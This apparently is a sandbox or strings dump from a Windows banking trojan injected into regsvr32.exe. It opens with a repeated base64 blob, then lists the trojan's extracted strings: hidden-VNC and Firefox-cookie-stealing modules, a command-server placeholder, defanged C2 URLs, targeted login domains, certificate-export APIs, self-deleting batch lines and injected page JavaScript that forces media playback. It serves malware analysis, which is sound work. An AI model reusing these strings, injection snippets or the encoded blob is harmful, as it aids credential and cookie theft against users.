OST6QkmSObIMuhwG29jbvnhbVkBoBF87U3y9At2usdlnDTqn4XpLgEzr7y2hW28IwB1IMTp9Lc6bs/CzxMTIhGomY3XuLHQwzR1JP47OS7oEmIqKqem/ZsWC1L6lxU8Ij7UPvlreS4ivFjOEkMFyOaba3a8HZ73Sz64k5kbCOaBgeIe73I3WYHege7t2AgsSmDfb mNbiqCpwT 8n/rYk/wFRgOhtF96FVrvKvvPQztLJTcWvQXDm8uncg auwcf KcNWpM5EsstUrJCnazVk28hDtvnVNw73zsmW6HORlfumWpVIqHmVaZ3GKzvu2/WkM9D76zHfFGxzSTmu/QY3v1nk3Z38ky 4FH5uyR0svcFUUmMICwF5 PubCdBq1XivsKGdcDKqwIagfL65CWPpHVBYhoPyPi/s1qIx5KPp/huaJWUkExnCC33e3S0XEoYM0ZtV6U08/fgJph0RqHyYg02Xf6Y3oM t5bEe2pKglGlExbApVTV6ZLKYKGPfbJuZQbAXCC5y8kZBk8efHtSk1OJqVXdBdu3xPesAqf5c8O5VK3gsoeZaEF0FCxBKj tz9vYZC02eQe6 suEpXVRAPmlwFByKUJyGIItA9 1hCBMuyNl sEz8p2qAH4aRiN3EeO3FcpPLwI3V4H6WVQOH2cR QoDJqfl1MzjOtbYnwZ2z2o j3EoDrkuN/dNQdwGlWXgYp2Ka4Dokjf N0l9jtdDeqcVIT7UnPxNobPutRirxsSJ2ykiPosbCuSmGJ2luJnNB2f544LQeD6Ywu5gBT7NC0CmN0zdiF//uq1mIzekizAnyOUYWpRppij5I9dhei3EuFxJKPvu9NohC121dVsh5GLiNcJ2rv2cLEjUiCN0mWy5nFaDe9yEG6Q4LUEw3h3spbcwkKgq3InOIXH5xyQL9R8ycznUoXgaMzAr/ISItqIw9JINdKxGL1  qjfEem6MYgVVsr/8choKvCW3007EyRqptoTDlADiu91orLcl0PbNb7BwNmfZYMYrAImr/ByyAPFLZO87xv/oBB pPVyNCJs p1FNOzmfv5NFa1bvC4f37nMbd9Udx/OikdZavj1wdDGzMX6oViwK VhwR r12DcYln6G6K0FiXQ7tHi5yP9RVPmiN76S1Vy2nlwA iOB3Pn9dU98LHhqob7bNx2VH7r 236DG4JEQj2rNOyrvDHeBZILrP8gpgQsyXAK/vkBtS6zefT5U985ibWtURWUNfHZ7CKJTgnao30Yvix7ONG9X55dsRcEJsMjn79ri1ggH4W1QbM5WFZMBPGSQDmCo6BJVEA0zw/H8OzA94G/meiuKtFGBET2kEJBXkiJ/Nj45RwF7GioMHDh2nVKeM9RtLi6QkyJY2F5p6JgfdOCy7Vb0zpCLzR/gTcI/SBE9fJEe2RdzbBEkIiIq/e5XXzdy5VE264JbYDhVUzkYqT5m5RvpQ1WaoYNLOogRS9kKjsthNMNbpWOOQIkjLaVTReY/CY S7dhLpEDz0n8gwdM2U/R8nu lECUYqEY2N5p3IRtfbkQ9BtlwlQBIFOblFccd1kks7s/p1tH9FyODzisTiaABwyIHBYjwJzod99fLPtGtDZ7wcJ 1TEaSyCWhxPcVqtsARsxgh8oGIM6Xyf9znVVg1pA4Ls5zfs/DfcZ7hLlvE6nzJh22z/9mdImznshhlPfIfcQ2rF97V9mikNxuGTNrfqHPJZPeBpwxJV5C918ybmhlPrOMKMJJmJKxJaM1i lyVp78eTRLF72u3n y3dEq5vOTbnCXE4gE61szPbjUc0NMmtPxnVrhoOajBwJyk7ozqJbZgxLPzF1gH0DvcrYPeUs/uFzXDlXwa/qB6C08bQDsH50J6UqQV67oX8HY4h28v49y7cUWUYt3Mcy8NznHD4clKGtsQJPldyCkekfi/tch9lmECxVI197U/93trIQrhvZKJtY c/pZlRliwqVhofXEh6c 
GUXPX1LEmI6YdIyElqCybGJFGlXYOTqNm3O4kuiUxZqPSmKBJ6QWuFIaJzSyZl Jg6uvi9mooC6CdqR Sx/PpLqV5cD7gnw66FcLDxTKXnvGFig9K/EVh cmYE/SWPl4i C2WAtSKZol6vKAbpi0JDfpAwb9eAx60GySErBYDPFQ9hV3OljxOyq9UBEM7OJk5Aot0tIA1CGT/TCL/Vw1eo6OBnKsvR2JwX5jtOhDXdZhbnLwIkjd8RNGb5Or93MOW7B2hKPfdUco6zV0CD GBCjois1LL6loZ33mdpD8QLjmSEjX0/DL iWQ9IThcbkpRV Z7qGXywNr4r4/WCNuOhUdugAlxgkLBloP2ipBDB7QYyEtUGgH0RAmE9n9dAqB6knCSFBq3L6G2EEv4CWMS6DrR8HgXt1rr10mz9JtQ2PQarG7zMxWyQG21w9uyT7EVBX0nir8Em95NT7X8HStIfGYMPIJ7xRUHkdxTx1pjFxzQWOVJcvKa5w5gpA1Xov1wrHpdWD8VCTFAkBfv6EfxUVSGGb OLa  MIsuuFY/WMhOOjwsujPMZPJFSW2Y7j2SkgtkTZ1FeXEraT6BPM7U zzi5szN0vXyzFMvIo5Uu3QUtJltqCVCohBgY7/cZ4po1gxL/va0HsYcxv6YwPJJq231t4rXLJ4hEOJTz6mvJMMrKz YdO2V/8UuI/pTD9KAcgsxdDp3oZfJbpfx6IsM7eT4F4LNHw695TSM/EgyiIV581yI4nPHNJfxYJ3aXrKI/3oIfmjG5gTZoe2McS7IyDT73KBBL wXfPBKnSRgaxj K0wDIqHpjJaK27UUZG3flQM8RX4q6hgjJQAqMhZIVJC0Z 7Dqg W9gui9 BPwTi Bqco9TXX1ju293YfVWajIe0 8BnvnmJTS7gXqFAa1mfLcZdM5cNsSj9nMiIS2FHcOHeeP2JHy5f6msa9r8wDpSmetJ1Guhf/C2rJjqA1EiQOJR4KXy2JsQtn7ahmRbDcY G6YukhUP0gjCjRqtEU8rs2S4RcsoHfAdO3UQGzwcST73Hohg6n6bH5Cu4obOlXvg0rdvbOw c6cCdEDHeWh0CwfWaSI/SslwL70DERLEDhjXDKdOxSgGBeryK0W75m2KDjcseqV9wxpZADM2II2XjrMCEMtQk29iUS9b7S2FBU0ncF3XHjttNqI5R2UimjOo57C2ESUqn3wK/uP490uI0 7Knr4OD5qc95H8/8eJz7CuIEx882f9Yd6goaCtChnBv8rzwUeH86vGTG4bmRKOX5H9ztPQHDO3hox1rmLXrgZTotKRmtyAS7MrB0pjZdQxu3vRyEsyLDy2YBQv5/y6ZSlRTI6oOhJO2C4c0pkOfdLrvRwAm2nHagci47ExA5k0xvoqK8mXydCQkOZGRJHon9SYqoVthUvfRwAxWXA6zllWTNb 8W8aXHc8YGcqpAQxuzLvTQZwW8C3/N DKFK3YyXVo54wu/Oo/LtmaZ0OVNKovH4LoOJSyLuqOmF4da2wdbd77pp2r5XYBc ri7Zsv6i makju6nos7WqQ/Fo9hG2tQGHoHz6srqQ7B0L3IKlvePezzzcwvn6qQE4Z5 yiNA wRJjVJSrGVBploFCMCA7VJYsAOUIr3FkxwmWYd K7d4f8ara5D20P2vzQoSY//YOLNyQWbRdcmie/jm8 tkLoO9qkJ Si4Q/rhOb229XRmnZmkv87KPDRLK5P5Kdl 1Gh0f7yRCGMQWlAnzmIzSWl6ufjKsy4OHw Ibg4fapFDoByZKKUxMyFFp1o2SuA/H6O5bu0GRvqoVpCNbSMRqVB7cRO8wM0/emO7ftHvENtuW9oujk85  Jjhu0zrH6iEIVxZm9cojZMHUd2B WJfdOdPhNO710 
x2l8hXOaqLDguLjZsgHlYR0M6IxlfJvivhj5MHOTRT1y4uxyTTlYgZFGyMXDgAKB2jXI3Cty0vZUTp5Q9PNpbLSoZGc/zw4/TpKWXyzfAHlkkibwotw2OYzUOgtbggg4jpmlBoT2JOao1ctkr2d3UBmAy8XpvspvnBX/xvpdRL/1QMys=lRCPASX27nuqqN0rPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADD
c2h3PgXWqt2QzTRrb/AnQFC6SRUgWch7j77TVxtWrXEisi5gWjLIKgQWWPjhp0UgEz/kVUGNipnIPLZxi8BxUOwd9J5DQbsosxVqooPcMxy2MFTKpmT8aROKg4jgPL5ULF6ilWRorquC8m0XR dR8hd6QeMVN1z8qMkD1vqxgm4LrkB3rrUobN/saPP2hYsk6VQTT5huKnOMVL5caR5vadBp7OdRzhgDnQIi0zuYfIv v02VfY9J3rrQjqC1  pFYIFt3Gp4UAQmbDJLGUi8hvJ5jIHnHXh6ZdE G2FTkJ3CI2Lj2wf8fOmqGCNuCUBH6Ec7vvAylDcuOVeqr6H9 GqsS1IfkCCllztP/uhBjWjey5V SSDAqDhRCVH uTCvACRGgad bO9wKfoRWb20kkPK8CJRO3Cb3ZBKGOeh51oRkebuOLldMrwBX33FmSkln88u4JdiIX3EOwtJpJ8fNuFb9sVJKqbY0xHN8Kq1Or8RhXvuFhn9jvExwsg77Nm9pukUDgOKXK2YjwzI43i2jlgqjXRjPGNPPw8yrBpOYbuqtlz4xPvXSChtWkqlonwCNmHPfYIqUJsozXDoUSntJjEjPKcnSYnNd4VI/OTKRZl4s3QZK4AiriXs m2G8zO3JfYHA4Mzloj7x/ZrAhvhzeMKq4FLKRhJG4T2JXyLgwvQjwXdohUQg4iEYHpcny L36V4uUkFcvU1tvpqDtiOQYa70HHcPEJfYLV8Toym38KdYL9IJPqUdop utIX7HhaldlXLQIAz7PWZnlHKctlhe5qmCRh7GYrijRosE0KLIyPrqsKKjC7bEFYXy01KABfO qe1pH4Q6vjT2LIWDeAU0QF7cNTSc9IrXxuiKrH9fzzDBmL0r2uP90MTpzx4Q6QXF6LFGMM4bSQRJvDy82dHpceQb5 wSJiwXfI1q0lw2j7yeKKU4d1S2yu1KSDqXTy9EIbNA OTz83nYnlm92yC4Q C1WaY TFWNwLLReTWs1XYS 5ycpe2nbJMnH2nWskkuEycGRyOKeWv9mBEriqVlrPdTjCXGsosq0/ze tTOFwuJz2YC0fKpts4kJR9uU15hpCl3Ic9igp1oMS77Hpr/6MeMHu7DkBY7jRBBOMa8af3kOwdC7KHIoA3ugO6idmr2mNlnOIPZ02aJF4A7BUmGxq6fAc/d4nsDOKJhYVDSSQ7jFKn0BxkkeEXGn1jlhM30sWUYRiITZB4hz3dELYpaKpOauqQgZJXLMoJUZjswMZcIHw8 hQQZBbCiXHRvYT0LMALC4KzcYhBVimTnaCzF92A/IwjwmuMcLdSrwxeDl hgJ64QRn4shSxTV72EJEeStKbUWop6I3XrGwDJziks02zJZ8Ngv5XQj8/6DVvQGXFx4TWNeBjq bLTDVLKQUg0huyqGeRETme3vgtHptbc3HtKLcy0vfPN7ho3GliJnfIlnwhAqPHR5IA154JiYW0oM7LzXCvf1CKxpj1LiIrZnwB6d7Jtt3Q8QKx 0eOeMKVM0ssWxpfLZL071LCj9dr01FLINneXWUENh HrZMrHiIwMc1UdC1vKZBx pQDZ646bysxGLoBQGMRzGdjCDwvbbfEXBUrd/g9Fb8hisLCdrpwEdRSFKUJPqH3u0UM6aNat6SOaQC2KyCuj XpXuVQl42OBunYjp28FYnjJ69lTqmpbMzQlwbndruPKMFUzTs7exQHCtDnZmeknvkCEDf6KSkltgHq1kAC84KUjHejJtsRDuBx0 zeOZ7k1xdwTTZ6D09GDNmaScqIuJBvxivLT94S5LKC6lFbmV89F32bLDuyMgdZst/wMPHcFbzg05tfs7uTHFvQFFuOLpHnHSgPnuNioE97QtBFTp6b9JZbfpd2gx jCYIjC6 c 
jSeFFiVxYZXbEZZZwc/YdSdKleWp1mhPeQm3JVaKaTXHwATQyKbAA5StQDJ1vp7z0ktMKi6ccOlyToNIZKAtx2K5VhhYNCQuk3aOczite07juFnr4cqEWU3ExokG73gHNySThVIb7F4aSuWLuvjJBJIPKF40P9iC768a11KJFrEnBjefcP2wz/YSZVEB4nyEQ06n3xYDzUt/F2cZ5JjhDq88rEvlE24 rRGht8HZgCa5XNtR51BNuBt3pp2eW78aCwiOEI8VDbn7AruVqkZrQQyYiz6MehXkTK77WrmjXVq5vzgUt4Jzu0pRfZGETR3S5xfz5uV2giiqXE6lYyjuBM0jm2JNf nUn iN35Go8p0Li5fuLrpjddQ1dFuKdDNclSXqPKGbcZU125ad0veW6dcXfvAw/P9kMO8/TKTtnfOw8XBDk2xHFOeyXOK/91hTRYgWLfAdC40pzwnNwRaWu2Aaw/vVSJQ/gFTtm5GDHCSIcKgmANglVtydNm8YkauqtmguErNundREO/6Xo5XpIF3kajshYV/7KjUgwJi9iqoftmRJ94/Tnr70imCuitzO5r81yZ3k1z4U 9Me8weKT69PB2aJTIMhrak6AV 2frGulcO1ju8IPk7W8QOYSGWq cymI4z/Bz5J1hFhMdrMzlFpBMzPF5zagQCDIFZV1HxA/RIEJeOKSZ4Sh1I 9/BXsFpOpr2zx DNvJXmpvgC81f5ca1ECBLO/o23asth4rsaKfBTvd5V ATraypf 5cH1w0H28a4Eb/Ho1gl2smdg5cfdBCyocaFQDyIhrgvO7l5RCcuG3sdDcbJzIvOHqtH8pP0vLIc1VLyyMD3b7vBzGSOxGaKGHNKEu/tR524QME0URfvXsGZU8fGNDZ3DE10bOQXQowrs34DwRQV3hyjTDDars/0rORfN73HxM NtO/9LTyB1neFGw7bd2xFjJ2 3mCbtmCg8m3ZfOK05dJ4zWtSUplLfpExGp NvDcwcq6kkSmvNjPrOG3lzUOkNU5LFwX fTSCdGTCfQ N7KO1iQp/ daGpiDbXS 1MYRI956xhzL6PchxIYyRYVOWPUSHrfgnlyaWcxAMhaj03mV4zdJncZwfgv/Dp1uMJAS0hikYb4RZOGHA7dU9G9T9SKw3OKguTYyrTdA55njE7WjvmI4MENhf2qDHPZ9g1qUSFArRTPUCG7yzx1NnKVcWcY7HkEV0j 9CGlVGrJ1 MiBpVEqzDY0vUeOH275PySs/rqsXNDJpLbNDmE0lbRtaNaOy3a3Tqdhx7Jx0Z84NQ9dllnjga9w XIiFWm5OwD P3yTbjqWPOTitm6HJkdvvvlBcOQSs8xyA9/Dvi/Uq0 rvcAOzBFRMoXpegqOp4ABA3rVGt6ooxDsMypVtyWhxdVWhkVraQr uMTeCoYUzwKWcOAP1AemeqcpTP6gxooeAaaTiEWs1Zs6 iB9 lIvynIWBmiCIJPTRXStMLo0r/dEUj4CiHg45RQB2syBda9JjdY0XGYeCNCLbz1JIZ27UeD6bi2aM/5n3a9MMny52SDEyjfO7Fm/sgwJu9KyKQtZOsuBOAU3iF4mpGB7NSG9y4I1fUVKO/QPr/Ri5wmz Zni3fuAEWTwd03qfK8ywZK0b5lagpTXuDab20 x86fQueLed2rRyaNQHQ4A/K7LlV/wNztP1gOQWKd/XqmkNNTUA3YqcXgA7 fFh0DdaKIz3ux5YYm6WpoR IjvZI0DudKoBDT5vbcg7awPBaPHmiwNi7krMp/wRhFAQ51N3v214gjeaW1j6bMR3lA9SoI3D7f1UnUxeMVlpAi9NPSkr/bs3ww4vgTkH3mWPh6JMWUXZ9/JW9DUb44EbqU sZnH33VZYhTRXvzPbeM33RlQ5PN4a5junE3q9tDwTu/7TzGARQvjLcA 
OST6QkmSObIMuhwG29jbvnhbVkBoBF87U3y9At2usdlnDTqn4XpLgEzr7y2hW28IwB1IMTp9Lc6bs/CzxMTIhGomY3XuLHQwzR1JP47OS7oEmIqKqem/ZsWC1L6lxU8Ij7UPvlreS4ivFjOEkMFyOaba3a8HZ73Sz64k5kbCOaBgeIe73I3WYHege7t2AgsSmDfb mNbiqCpwT 8n/rYk/wFRgOhtF96FVrvKvvPQztLJTcWvQXDm8uncg auwcf KcNWpM5EsstUrJCnazVk28hDtvnVNw73zsmW6HORlfumWpVIqHmVaZ3GKzvu2/WkM9D76zHfFGxzSTmu/QY3v1nk3Z38ky 4FH5uyR0svcFUUmMICwF5 PubCdBq1XivsKGdcDKqwIagfL65CWPpHVBYhoPyPi/s1qIx5KPp/huaJWUkExnCC33e3S0XEoYM0ZtV6U08/fgJph0RqHyYg02Xf6Y3oM t5bEe2pKglGlExbApVTV6ZLKYKGPfbJuZQbAXCC5y8kZBk8efHtSk1OJqVXdBdu3xPesAqf5c8O5VK3gsoeZaEF0FCxBKj tz9vYZC02eQe6 suEpXVRAPmlwFByKUJyGIItA9 1hCBMuyNl sEz8p2qAH4aRiN3EeO3FcpPLwI3V4H6WVQOH2cR QoDJqfl1MzjOtbYnwZ2z2o j3EoDrkuN/dNQdwGlWXgYp2Ka4Dokjf N0l9jtdDeqcVIT7UnPxNobPutRirxsSJ2ykiPosbCuSmGJ2luJnNB2f544LQeD6Ywu5gBT7NC0CmN0zdiF//uq1mIzekizAnyOUYWpRppij5I9dhei3EuFxJKPvu9NohC121dVsh5GLiNcJ2rv2cLEjUiCN0mWy5nFaDe9yEG6Q4LUEw3h3spbcwkKgq3InOIXH5xyQL9R8ycznUoXgaMzAr/ISItqIw9JINdKxGL1  qjfEem6MYgVVsr/8choKvCW3007EyRqptoTDlADiu91orLcl0PbNb7BwNmfZYMYrAImr/ByyAPFLZO87xv/oBB pPVyNCJs p1FNOzmfv5NFa1bvC4f37nMbd9Udx/OikdZavj1wdDGzMX6oViwK VhwR r12DcYln6G6K0FiXQ7tHi5yP9RVPmiN76S1Vy2nlwA iOB3Pn9dU98LHhqob7bNx2VH7r 236DG4JEQj2rNOyrvDHeBZILrP8gpgQsyXAK/vkBtS6zefT5U985ibWtURWUNfHZ7CKJTgnao30Yvix7ONG9X55dsRcEJsMjn79ri1ggH4W1QbM5WFZMBPGSQDmCo6BJVEA0zw/H8OzA94G/meiuKtFGBET2kEJBXkiJ/Nj45RwF7GioMHDh2nVKeM9RtLi6QkyJY2F5p6JgfdOCy7Vb0zpCLzR/gTcI/SBE9fJEe2RdzbBEkIiIq/e5XXzdy5VE264JbYDhVUzkYqT5m5RvpQ1WaoYNLOogRS9kKjsthNMNbpWOOQIkjLaVTReY/CY S7dhLpEDz0n8gwdM2U/R8nu lECUYqEY2N5p3IRtfbkQ9BtlwlQBIFOblFccd1kks7s/p1tH9FyODzisTiaABwyIHBYjwJzod99fLPtGtDZ7wcJ 1TEaSyCWhxPcVqtsARsxgh8oGIM6Xyf9znVVg1pA4Ls5zfs/DfcZ7hLlvE6nzJh22z/9mdImznshhlPfIfcQ2rF97V9mikNxuGTNrfqHPJZPeBpwxJV5C918ybmhlPrOMKMJJmJKxJaM1i lyVp78eTRLF72u3n y3dEq5vOTbnCXE4gE61szPbjUc0NMmtPxnVrhoOajBwJyk7ozqJbZgxLPzF1gH0DvcrYPeUs/uFzXDlXwa/qB6C08bQDsH50J6UqQV67oX8HY4h28v49y7cUWUYt3Mcy8NznHD4clKGtsQJPldyCkekfi/tch9lmECxVI197U/93trIQrhvZKJtY c/pZlRliwqVhofXEh6c 
GUXPX1LEmI6YdIyElqCybGJFGlXYOTqNm3O4kuiUxZqPSmKBJ6QWuFIaJzSyZl Jg6uvi9mooC6CdqR Sx/PpLqV5cD7gnw66FcLDxTKXnvGFig9K/EVh cmYE/SWPl4i C2WAtSKZol6vKAbpi0JDfpAwb9eAx60GySErBYDPFQ9hV3OljxOyq9UBEM7OJk5Aot0tIA1CGT/TCL/Vw1eo6OBnKsvR2JwX5jtOhDXdZhbnLwIkjd8RNGb5Or93MOW7B2hKPfdUco6zV0CD GBCjois1LL6loZ33mdpD8QLjmSEjX0/DL iWQ9IThcbkpRV Z7qGXywNr4r4/WCNuOhUdugAlxgkLBloP2ipBDB7QYyEtUGgH0RAmE9n9dAqB6knCSFBq3L6G2EEv4CWMS6DrR8HgXt1rr10mz9JtQ2PQarG7zMxWyQG21w9uyT7EVBX0nir8Em95NT7X8HStIfGYMPIJ7xRUHkdxTx1pjFxzQWOVJcvKa5w5gpA1Xov1wrHpdWD8VCTFAkBfv6EfxUVSGGb OLa  MIsuuFY/WMhOOjwsujPMZPJFSW2Y7j2SkgtkTZ1FeXEraT6BPM7U zzi5szN0vXyzFMvIo5Uu3QUtJltqCVCohBgY7/cZ4po1gxL/va0HsYcxv6YwPJJq231t4rXLJ4hEOJTz6mvJMMrKz YdO2V/8UuI/pTD9KAcgsxdDp3oZfJbpfx6IsM7eT4F4LNHw695TSM/EgyiIV581yI4nPHNJfxYJ3aXrKI/3oIfmjG5gTZoe2McS7IyDT73KBBL wXfPBKnSRgaxj K0wDIqHpjJaK27UUZG3flQM8RX4q6hgjJQAqMhZIVJC0Z 7Dqg W9gui9 BPwTi Bqco9TXX1ju293YfVWajIe0 8BnvnmJTS7gXqFAa1mfLcZdM5cNsSj9nMiIS2FHcOHeeP2JHy5f6msa9r8wDpSmetJ1Guhf/C2rJjqA1EiQOJR4KXy2JsQtn7ahmRbDcY G6YukhUP0gjCjRqtEU8rs2S4RcsoHfAdO3UQGzwcST73Hohg6n6bH5Cu4obOlXvg0rdvbOw c6cCdEDHeWh0CwfWaSI/SslwL70DERLEDhjXDKdOxSgGBeryK0W75m2KDjcseqV9wxpZADM2II2XjrMCEMtQk29iUS9b7S2FBU0ncF3XHjttNqI5R2UimjOo57C2ESUqn3wK/uP490uI0 7Knr4OD5qc95H8/8eJz7CuIEx882f9Yd6goaCtChnBv8rzwUeH86vGTG4bmRKOX5H9ztPQHDO3hox1rmLXrgZTotKRmtyAS7MrB0pjZdQxu3vRyEsyLDy2YBQv5/y6ZSlRTI6oOhJO2C4c0pkOfdLrvRwAm2nHagci47ExA5k0xvoqK8mXydCQkOZGRJHon9SYqoVthUvfRwAxWXA6zllWTNb 8W8aXHc8YGcqpAQxuzLvTQZwW8C3/N DKFK3YyXVo54wu/Oo/LtmaZ0OVNKovH4LoOJSyLuqOmF4da2wdbd77pp2r5XYBc ri7Zsv6i makju6nos7WqQ/Fo9hG2tQGHoHz6srqQ7B0L3IKlvePezzzcwvn6qQE4Z5 yiNA wRJjVJSrGVBploFCMCA7VJYsAOUIr3FkxwmWYd K7d4f8ara5D20P2vzQoSY//YOLNyQWbRdcmie/jm8 tkLoO9qkJ Si4Q/rhOb229XRmnZmkv87KPDRLK5P5Kdl 1Gh0f7yRCGMQWlAnzmIzSWl6ufjKsy4OHw Ibg4fapFDoByZKKUxMyFFp1o2SuA/H6O5bu0GRvqoVpCNbSMRqVB7cRO8wM0/emO7ftHvENtuW9oujk85  Jjhu0zrH6iEIVxZm9cojZMHUd2B WJfdOdPhNO710 
x2l8hXOaqLDguLjZsgHlYR0M6IxlfJvivhj5MHOTRT1y4uxyTTlYgZFGyMXDgAKB2jXI3Cty0vZUTp5Q9PNpbLSoZGc/zw4/TpKWXyzfAHlkkibwotw2OYzUOgtbggg4jpmlBoT2JOao1ctkr2d3UBmAy8XpvspvnBX/xvpdRL/1QMys=lRCPASX27nuqqN0rPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADD"
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
66006666
"c:\docume~1\"%CurrentUserName%"\locals~1\temp\tmpf7521b9d\bindata865.exe" path<<c:\docume~1\"%CurrentUserName%"\locals~1\temp\tmpf7521b9d\bindata865.exe>>path inj_ffile<<:2:>>inj_ffile

regsvr32.exe_3264_rwx_00070000_00047000:

.text
`.data
.reloc
update.exe
config.bin
%0&!%F
?)500>(8
7-52&<&,
,%)4.5(";$2
:'$!71689/
-0=).?,7
60/)4:5<
-*?)2<3:
>5;(4-2>)4 }744
"?5&"5%3%/
398>7="'
;!)5:. =##
Z#%xDVOE
(00(7> <$>59<&=3 =
$6>59$=1
^EXKSQN_^%X Sf
PR_OpenTCPSocket
%s%s%s
gdiplus.dll
GdiplusShutdown
ole32.dll
gdi32.dll
value=[%s], code=[%s]
HTTP/1.1
HTTP/1.0
hXXps://
GET /favicon.ico HTTP/1.1
HTTP/1.
X-WebKit-CSP
hXXp://VVV.google.com/webhp
%COMMANDSERVER%
hXXp://127.0.0.1:%u/
X-Type: %s
_getFirefoxCookie
hXXp://
atmos_hvnc.module
atmos_ffcookie.module
atmos_video.module
userenv.dll
del "%s"
if exist "%s" goto d
del /F "%s"
Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; SV1)
urlmon.dll
cabinet.dll
hXXp://xxxxxxxx.com/xxxx/xxxx.php
%s, u %s %u u:u:u GMT
; charset=%s
HTTP/1.1 %u %s
Date: %s
Content-Length: %u
Expires: %s
Content-Type: %s%s
ID: %s
value_%s
value_%s_%s
%s = "%s";
*.facebook.com
*.twitter.com
*.instagram.com
*.booking.com
*.sharepoint.com
*.yahoo.com
login.yahoo.com
*.google.com
accounts.google.com
192.168.*.*
127.0.0.1
*/wp-login.php*
*.xn--p1ai
Cookie: %s
Referer: %s
Accept: %s
Accept-Language: %s
Accept-Encoding: %s
SSSh8
9.tI3
CreatePipe
GetWindowsDirectoryW
GetProcessHeap
KERNEL32.dll
GetKeyboardState
MsgWaitForMultipleObjects
ExitWindowsEx
USER32.dll
RegCreateKeyW
RegEnumKeyW
RegQueryInfoKeyW
RegCloseKey
RegCreateKeyExW
RegOpenKeyExW
RegEnumKeyExW
ADVAPI32.dll
UrlUnescapeA
SHDeleteKeyW
PathIsURLW
SHLWAPI.dll
ShellExecuteW
ShellExecuteExW
SHELL32.dll
Secur32.dll
GDI32.dll
WS2_32.dll
PFXImportCertStore
CertDeleteCertificateFromStore
CertOpenSystemStoreW
CertCloseStore
CertEnumCertificatesInStore
CertDuplicateCertificateContext
PFXExportCertStoreEx
CRYPT32.dll
HttpSendRequestExA
HttpQueryInfoA
HttpSendRequestExW
HttpSendRequestW
HttpOpenRequestA
HttpOpenRequestW
HttpEndRequestA
HttpSendRequestA
HttpEndRequestW
GetUrlCacheEntryInfoW
HttpAddRequestHeadersW
HttpAddRequestHeadersA
InternetCrackUrlA
InternetCrackUrlW
WININET.dll
OLEAUT32.dll
NETAPI32.dll
VERSION.dll
NtQueryKey
ntdll.dll
PSSSSSSh
SSSh4
SUWt^Ht[Ht.Huc
2!242:2?2[2
Chrome
Firefox
nnspr4.dll
nss3.dll
chrome.dll
Process (u minute): %s
Input: %s
X-TS-Rule-Name: %s
X-TS-Rule-PatternID: %u
X-TS-BotID: %s
X-TS-Domain: %s
X-TS-SessionID: %s
Content-Type: application/x-www-form-urlencoded
X-TS-Header-Cookie: %S
X-TS-Header-Referer: %S
X-TS-Header-AcceptEncoding: %S
X-TS-Header-AcceptLanguage: %S
X-TS-Header-UserAgent: %S
kernel32.dll
Global\XXX
Company: %s
Product: %s
Version: %s
Software\Microsoft\Windows\CurrentVersion\Uninstall
%u: %s | %s | %s
%sd1%
%sd2%
Name: %s
Path: %s
Hash: %s
Time: u.u.u
\StringFileInfo\xx\%s
"%s" %s
/c "%s"
%sx.%s
%sx
SELECT * FROM %s
Rapport
sXXXX
d*.swf
*.flv
*.png
*.jpg
*.ico
*.gif
*.css
%Documents and Settings%\%current user%\Application Data\Uccyemuzput\odobdima.xia
%Documents and Settings%\%current user%\Application Data\Uccyemuzput
odobdima.xia
%Documents and Settings%\%current user%\Application Data\Felaytzyymes\zaodxiibaru.ilb
%Documents and Settings%\%current user%\Application Data\Felaytzyymes
zaodxiibaru.ilb
%Documents and Settings%\%current user%\Application Data

regsvr32.exe_3264_rwx_000D0000_000C0000:

.idata
.reloc
P.rsrc
Portions Copyright (c) 1983,99 Borland
kernel32.dll
Software\Microsoft\Windows NT\CurrentVersion
wininet.dll
user32.dll
ntdll.dll
Kernel32.dll
URLMON.DLL
Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.30729)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
PSAPI.dll
HTTP/1.1
Content-Type: application/x-www-form-urlencoded
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i++){ els[i].play();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i++){ els[i].Play();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i++){ els[i].PLAY();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i++){ els[i].play();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i++){ els[i].Play();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i++){ els[i].PLAY();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i++){ els[i].playVideo();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i++){ els[i].playVideo();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i++){ els[i].start();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i++){ els[i].Start();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i++){ els[i].START();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i++){ els[i].start();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i++){ els[i].Start();}} catch(e){}
